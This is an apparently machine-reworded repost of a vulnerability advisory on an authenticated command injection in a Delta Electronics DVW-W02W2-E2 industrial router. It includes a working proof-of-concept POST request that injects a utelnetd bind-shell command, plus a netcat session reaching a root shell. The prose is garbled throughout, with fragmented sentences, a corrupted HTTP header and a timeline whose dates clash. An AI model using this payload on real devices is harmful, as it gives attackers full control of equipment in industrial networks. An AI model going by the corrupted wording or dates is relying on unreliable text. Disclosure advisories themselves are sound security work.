![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
CyberDanube Security Research, 20221130-1
——————————————————————————-
Authenticated Command Injection
product| Delta Electronics DVW-W02W2-E2
vulnerable version| V2.42
V2.5.2
–
High
homepage| https://www.deltaww.com
found| 2022-08-01
by| T. Weber (Office Vienna)
CyberDanube Security Research
| Vienna | St. Polten
|
| https://www.cyberdanube.com
——————————————————————————-
Vendor description
——————————————————————————-
“Delta was founded in 1971 and is a worldwide provider of thermal energy and power.
Management
solutions. The company’s mission is “To Provide Innovative, Clean and Energy-Efficient Solutions.”
“Effective solutions for a Better Tomorrow” focuses on key issues.
Environmental issues like global climate change are important. Energy-saving
Solutions provider that has core competences in power electronics
automation,
Delta has three business segments: Power Electronics and Automation.
Infrastructure.”
Source: https://www.deltaww.com/en-US/about/aboutProfile
Vulnerable versions
——————————————————————————-
DVW-W02W2-E2 / V2.42
Overview of vulnerability
——————————————————————————-
1) Inject Authenticated Command
An authenticated command injection is possible on the web server.
This allows attackers to have full access to the operating system
System of
The device must have all consequences. Such a device can be used as a key
Device in
An industrial network that controls critical equipment using serial communication.
ports,
An attempt to cause more damage to the network may result in greater destruction.
attacker.
The Proof of the Concept
——————————————————————————-
1) Injection of Authenticated Command
A POST authenticated command injection is possible on the web server
parameters. Only if “timestamp”, the parameter, is used.
Correctly
You can find the URL. This proof-of concept shows you how to make a port binding.
Shell on port 8889 to connect with an “utelnetd” listener
===============================================================================
POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1
Host: 192.168.3.148
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Origin: http://192.168.3.148
Connectivity: Close
Referer: http://192.168.3.148/MT_ping.htm
Cookie: xxid=1973719449
Upgrade-Insecure-Requests: 1
submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`
===============================================================================
The command “netcat”, which allows you to access the device’s information, can be used.
===============================================================================
$ nc 192.168.3.150 8889
!
BusyBox version 1.4.2 (2016-08-18 22.45:41 EDT). Built-in shell. (ash)
For a complete list of commands, enter ‘help’
/ #
===============================================================================
This vulnerability was verified manually on an emulated device using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Lösung
——————————————————————————-
Upgrade to V2.5.2 firmware
You can work around it
——————————————————————————-
None
Recommendation
——————————————————————————-
CyberDanube suggests that Delta Electronics customers upgrade their computers
Firmware
The latest version is available.
Get in touch with us
——————————————————————————-
2022-08-02: Contacting Delta Electronics.
2022-08-10
Consult with
Delta Electronics.
2022-08-16 : Security Contact asked few questions about responsible
Disclosure; Sent responses
2022-08-30: We are requesting an update.
2022/09/01: Vendor replied that they would need to take more time in order to solve the issue.
Issues; Additional 30 Days (until 0222-11-02)
patching.
2022-10-11
2022-10-12: Vendor replied that the fixing would be performed 2022-11-15; Shifted
Release date at this time
2022-10-16 – Vendor has moved the release date to 2022-11-18 Shifted
advisory
Release date: The same day.
2022-10-17
2022-10-18 – Asked for an upgrade and moved the release date to 2022-10-22
2022-10-19: Vendor replied that the release of the document was not possible.
patch.
Contact informed us that the patch would delay to end of
November.
2022-10-21: I asked the vendor for a specific release date.
2022-10-28 : Vendor has been advised of an advisory release date for 2022-10-30.
2022-10-30: Found firmware patches with the issue date of 2022-11-25 at vendors
website.
2022-10-30 Coordination of release
advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Email: cyberdanube at com
EOF T. Weber / @2022
